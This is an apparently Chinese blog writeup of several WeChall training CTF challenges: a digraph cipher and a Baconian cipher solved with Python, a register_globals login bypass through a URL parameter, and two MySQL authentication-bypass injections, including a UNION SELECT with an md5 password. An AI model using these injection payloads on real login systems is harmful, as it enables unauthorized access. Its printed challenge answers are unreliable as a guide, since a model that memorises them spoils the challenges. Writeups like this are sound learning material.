0
点赞
收藏
分享

微信扫一扫

WeChall CTF Writeup(四)

花海书香 2022-02-27 阅读 114

文章目录

以下题目标题组成:
[Score] [Title] [Author]

0x16 2 Training: Crypto - Digraphs by Gizmore

在这里插入图片描述
题目意思:
这次我使用有向图加密方案将一个字母加密为两个字符。
只需 26 个不同的字母,我就可以加密多达 26*26 个不同的字符。
另一个大问题是共享密钥,但密码很容易被破解。
消息使用当前语言,以正确的大小写和标点符号书写。没有换行符。
在这里插入图片描述
由此得出每两位对应一个字母或字符

tqlgwdfpsgunhdufhwunhdzmlgwdlapa vxlguf aclsdhsgcvlzhdlsac hdgnzmla kplslalaunfpls laufdhdhlslalaldufhwhwcvpa djunla wdlghd hdlglg aczmldldzmdhufhwhd lszmhdgnlssghe xsunla zmhdhv djlshwhwhe fplglgac dblgejpa jawdhdlssg hdgnzmla hnlscvxslgsgac unla lalghwufhdzmlgwdzo ejldejldlgejhwejwdldlshwpa

查看规律,因为有符号,猜测符号在最后一位,pa应该对应符号

tqlgwdfpsgunhdufhwunhdzmlgwdlapa
vxlguf aclsdhsgcvlzhdlsac hdgnzmla kplslalaunfpls laufdhdhlslalaldufhwhwcvpa
djunla wdlghd hdlglg aczmldldzmdhufhwhd lszmhdgnlssghe xsunla zmhdhv djlshwhwhe fplglgac dblgejpa
jawdhdlssg hdgnzmla hnlscvxslgsgac unla lalghwufhdzmlgwdzo ejldejldlgejhwejwdldlshwpa

pa之前的字母有30个,应该对应一个单词,tqlgwdfpsgunhdufhwunhdzmlgwdla
在这里插入图片描述
大胆猜测tqlgwdfpsgunhdufhwunhdzmlgwdla在此语境下应为congratulations

'tq':'c',
'lg':'o',
'wd':'n',
'fp':'g',
'sg':'r',
'un':'a',
'hd':'t',
'uf':'u',
'hw':'l',
'un':'a',
'hd':'t',
'zm':'i',
'lg':'o',
'wd':'n',
'la':'s',
'pa':'.',
a = "tqlgwdfpsgunhdufhwunhdzmlgwdlapa vxlguf aclsdhsgcvlzhdlsac hdgnzmla kplslalaunfpls laufdhdhlslalaldufhwhwcvpa djunla wdlghd hdlglg aczmldldzmdhufhwhd lszmhdgnlssghe xsunla zmhdhv djlshwhwhe fplglgac dblgejpa jawdhdlssg hdgnzmla hnlscvxslgsgac unla lalghwufhdzmlgwdzo ejldejldlgejhwejwdldlshwpa"
b = a.split()
dic = {'tq':'C','lg':'o','wd':'n','fp':'g','sg':'r','un':'a','hd':'t','uf':'u','hw':'l','un':'a','hd':'t','zm':'i','lg':'o','wd':'n','la':'s','pa':'.'}
for i in b:
    c =[]
    for j in range(0,len(i),2):
        c.append(i[j:j+2])
    print(c)
    
    d = []
    for k in c:
        if k in dic:
            d.append(dic[k])
        else:
            d.append('_')
    txt = ''.join(d)
    print(txt)
    print()

在这里插入图片描述
根据“congratulations.” 可以推测出其他单词

_ou - You
t_is - this
__ssag_ - message
su___ss_ull_. - successfully
goo_ - good

得到新的key

'vx' : 'Y'
'gn' : 'h'
'kp' : 'M'
'ls' : 'e'
'dh' : 'c'
'pa' : ','//猜测
'ac' : 'd'

在这里插入图片描述
迭代进行

'cv' : 'y'
'lz' : 'p'
'ld' : 'f'
'dj' : 'w'
'hv' : 's'
'he' : ','//猜测

在这里插入图片描述

'hn' : 'k'
'xs' : 'b'
'db' : 'j'
'ej' : 'b'

在这里插入图片描述
bfbfoblbnfel

0x17 2 Training: MySQL I by Gizmore

在这里插入图片描述
题目意思:
这是经典的mysql注入挑战。
您的任务很简单:以管理员身份登录。
再次为您提供源代码,也作为突出显示的版本。

查看题目已经给的代码
在这里插入图片描述

SELECT * FROM users WHERE username='$username' AND password='$password'

答案

admin'#

0x18 2 Training: MySQL II by Gizmore

在这里插入图片描述
题目意思:
这与MySQL1相同,但您必须想出更高级的注入来欺骗此身份验证。
你的任务又来了:以管理员身份登录。
再次为您提供源代码,也作为突出显示的版本。
在这里插入图片描述

<?php
/* TABLE STRUCTURE
CREATE TABLE IF NOT EXISTS users (
userid    INT(11) UNSIGNED AUTO_INCREMENT PRIMARY KEY,
username  VARCHAR(32) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL,
password  CHAR(32) CHARACTER SET ascii COLLATE ascii_bin NOT NULL
) ENGINE=myISAM;
*/

其中有三个参数
username password进行了分开验证

SELECT * FROM users WHERE username='$username'

构造新语句

SELECT * FROM users WHERE username='admin1' union select 1,'admin',md5('password');#

让下面的判断语句以为搜到的数据为“1,‘admin’,md5(‘password’)”
password处输入password
答案
admin1’ union select 1,‘admin’,md5(‘password’);#

0x19 2 Training: Register Globals by Gizmore

在这里插入图片描述
题目意思:
这个挑战是旧 PHP 时代的遗留物,默认情况下已启用全局寄存器,这通常会导致安全问题。
同样,您的工作是以管理员身份登录,并为您提供源代码以及突出显示的版本。

这是易受攻击的脚本的链接。
我还设置了一个测试帐户:test:test

在这里插入图片描述

参考链接:
http://www.chiange.com/php%e4%bd%bf%e7%94%a8-register-globals%e5%8f%af%e8%83%bd%e5%bc%95%e5%8f%91%e7%9a%84%e9%97%ae%e9%a2%98/

在这里插入图片描述

答案
http://www.wechall.net/challenge/training/php/globals/globals.php?login[0]=admin

0x20 2 Training: Math Pyramid by Gizmore

在这里插入图片描述
题目意思:
这是数学挑战的第一个版本。
您必须为几何函数想出最短的解决方案(9 个字符或更少)。
故事是这样的:

Pharao momo想要一个基于正方形的金字塔,其中所有八个边的长度都相同“a”。
请用公式支持他计算给定边长的体积。

示例公式:a^3/3sqrt(aa)
符号提示:sqrt()、a^2 等。
在这里插入图片描述
a^3/3 *sqrt(2) --> a3/180.5 --> 18-0.5a3
还是多1个字符,搜索才发现.之前的0可以省略
答案
18-.5a3

0x20 2 Training: Baconian by Gizmore

在这里插入图片描述
题目意思
在此培训挑战中,您必须在另一条消息中揭示隐藏的消息。
众所周知,消息是通过培根密码隐藏的。
同样,每个会话的解决方案都会发生变化,并由 12 个随机字符组成。

The Message
BaCoN’s cIphEr or THE bacOnIAN CiPHer iS a meThOD oF sTEGaNOGrapHY (a METhoD Of HidIng A sECRet MeSsaGe as OpPOsEd TO a TRUe CiPHeR) dEVIseD BY francis bAcoN. a MessAge Is coNCeALED in THe pRESenTatIoN OF TexT, ratHer thaN iTs coNteNt. tO enCODe A MEsSaGe, eaCh lETter Of THe pLAInText Is rePLAcED By A groUp oF fIvE OF the LettERs ‘a’ oR ‘B’. ThIS RePlaCemEnt is donE acCORDinG to thE alPhABeT of tHe BACOnIAN cIpHeR, sHoWn bElOw. NoTe: A SeCoNd vErSiOn oF BaCoN’S CiPhEr uSeS A UnIqUe cOdE FoR EaCh lEtTeR. iN OtHeR WoRdS, i aNd j eAcH HaS ItS OwN PaTtErN. tHe wRiTeR MuSt mAkE UsE Of tWo dIfFeReNt tYpEfAcEs fOr tHiS CiPhEr. AfTeR PrEpArInG A FaLsE MeSsAgE WiTh tHe sAmE NuMbEr oF LeTtErS As aLl oF ThE As aNd bS In tHe rEaL, sEcReT MeSsAgE, tWo tYpEfAcEs aRe cHoSeN, oNe tO RePrEsEnT As aNd tHe oThEr bS. tHeN EaCh lEtTeR Of tHe fAlSe mEsSaGe mUsT Be pReSeNtEd iN ThE ApPrOpRiAtE TyPeFaCe, AcCoRdInG To wHeThEr iT StAnDs fOr aN A Or a b. To dEcOdE ThE MeSsAgE, tHe rEvErSe mEtHoD Is aPpLiEd. EaCh ‘TyPeFaCe 1’ LeTtEr iN ThE FaLsE MeSsAgE Is rEpLaCeD WiTh aN A AnD EaCh ‘TyPeFaCe 2’ LeTtEr iS RePlAcEd wItH A B. tHe bAcOnIaN AlPhAbEt iS ThEn uSeD To rEcOvEr tHe oRiGiNaL MeSsAgE. aNy mEtHoD Of wRiTiNg tHe mEsSaGe tHaT AlLoWs tWo dIsTiNcT RePrEsEnTaTiOnS FoR EaCh cHaRaCtEr cAn bE UsEd fOr tHe bAcOn cIpHeR. bAcOn hImSeLf pRePaReD A BiLiTeRaL AlPhAbEt[2] FoR HaNdWrItTeN CaPiTaL AnD SmAlL LeTtErS WiTh eAcH HaViNg tWo aLtErNaTiVe fOrMs, OnE To bE UsEd aS A AnD ThE OtHeR As b. ThIs wAs pUbLiShEd aS An iLlUsTrAtEd pLaTe iN HiS De aUgMeNtIs sCiEnTiArUm (ThE AdVaNcEmEnT Of lEaRnInG). BeCaUsE AnY MeSsAgE Of tHe rIgHt lEnGtH CaN Be uSeD To cArRy tHe eNcOdInG, tHe sEcReT MeSsAgE Is eFfEcTiVeLy hIdDeN In pLaIn sIgHt. ThE FaLsE MeSsAgE CaN Be oN AnY ToPiC AnD ThUs cAn dIsTrAcT A PeRsOn sEeKiNg tO FiNd tHe rEaL MeSsAgE.

在这里插入图片描述
法兰西斯·培根另外准备了一种方法,其将大小写分别看作A与B,可用于无法使用不同字体的场合(例如只能处理纯文本时)。但这样比起字体不同更容易被看出来,而且和语言对大小写的要求也不太兼容。
培根密码本质上是将二进制信息通过样式的区别,加在了正常书写之上。培根密码所包含的信息可以和用于承载其的文章完全无关。

通过代码将文本大写转为A,小写转为B

a = "BaCoN's cIphEr or THE bacOnIAN CiPHer iS a meThOD oF sTEGaNOGrapHY (a METhoD Of HidIng A sECRet MeSsaGe as OpPOsEd TO a TRUe CiPHeR) dEVIseD BY francis bAcoN. a MessAge Is coNCeALED in THe pRESenTatIoN OF TexT, ratHer thaN iTs coNteNt. tO enCODe A MEsSaGe, eaCh lETter Of THe pLAInText Is rePLAcED By A groUp oF fIvE OF the LettERs 'a' oR 'B'. ThIS RePlaCemEnt is donE acCORDinG to thE alPhABeT of tHe BACOnIAN cIpHeR, sHoWn bElOw. NoTe: A SeCoNd vErSiOn oF BaCoN'S CiPhEr uSeS A UnIqUe cOdE FoR EaCh lEtTeR. iN OtHeR WoRdS, i aNd j eAcH HaS ItS OwN PaTtErN. tHe wRiTeR MuSt mAkE UsE Of tWo dIfFeReNt tYpEfAcEs fOr tHiS CiPhEr. AfTeR PrEpArInG A FaLsE MeSsAgE WiTh tHe sAmE NuMbEr oF LeTtErS As aLl oF ThE As aNd bS In tHe rEaL, sEcReT MeSsAgE, tWo tYpEfAcEs aRe cHoSeN, oNe tO RePrEsEnT As aNd tHe oThEr bS. tHeN EaCh lEtTeR Of tHe fAlSe mEsSaGe mUsT Be pReSeNtEd iN ThE ApPrOpRiAtE TyPeFaCe, AcCoRdInG To wHeThEr iT StAnDs fOr aN A Or a b. To dEcOdE ThE MeSsAgE, tHe rEvErSe mEtHoD Is aPpLiEd. EaCh 'TyPeFaCe 1' LeTtEr iN ThE FaLsE MeSsAgE Is rEpLaCeD WiTh aN A AnD EaCh 'TyPeFaCe 2' LeTtEr iS RePlAcEd wItH A B. tHe bAcOnIaN AlPhAbEt iS ThEn uSeD To rEcOvEr tHe oRiGiNaL MeSsAgE. aNy mEtHoD Of wRiTiNg tHe mEsSaGe tHaT AlLoWs tWo dIsTiNcT RePrEsEnTaTiOnS FoR EaCh cHaRaCtEr cAn bE UsEd fOr tHe bAcOn cIpHeR. bAcOn hImSeLf pRePaReD A BiLiTeRaL AlPhAbEt[2] FoR HaNdWrItTeN CaPiTaL AnD SmAlL LeTtErS WiTh eAcH HaViNg tWo aLtErNaTiVe fOrMs, OnE To bE UsEd aS A AnD ThE OtHeR As b. ThIs wAs pUbLiShEd aS An iLlUsTrAtEd pLaTe iN HiS De aUgMeNtIs sCiEnTiArUm (ThE AdVaNcEmEnT Of lEaRnInG). BeCaUsE AnY MeSsAgE Of tHe rIgHt lEnGtH CaN Be uSeD To cArRy tHe eNcOdInG, tHe sEcReT MeSsAgE Is eFfEcTiVeLy hIdDeN In pLaIn sIgHt. ThE FaLsE MeSsAgE CaN Be oN AnY ToPiC AnD ThUs cAn dIsTrAcT A PeRsOn sEeKiNg tO FiNd tHe rEaL MeSsAgE."
b = []
A = "A";
B = "B";
for i in a:
    if ord(i)>=65 and ord(i)<=90:
        b.append(B)
    elif ord(i)>=97 and ord(i)<=122:
        b.append(A)
    else:
        pass
print(''.join(b))

在这里插入图片描述

在线工具
http://www.hiencode.com/baconian.html

在这里插入图片描述
veryxwellxdonexfellowxhackerxthexsecretxkeywordxisxcghosibhsclixxkvfksujouwkwwurnwvfnfwjksvewvlkxlkjnjvmtmtevlkuvjfknkzeuvuvskkszktnkwvkvsusoevwvjkkzkvkvjwwvsvuvkvjvjosvvjuwkskwvjlfjfjnjflkvlnfkjuskkvfjkkvnkwvwwvuwusvjkzuwwkjktfkstmvjkvnkwkwvwvskkfsskvfnlfkswkkwwvwnvwskxkktjfv

在这里插入图片描述
利用sublim替换x
答案
cghosibhscli

举报

相关推荐

0 条评论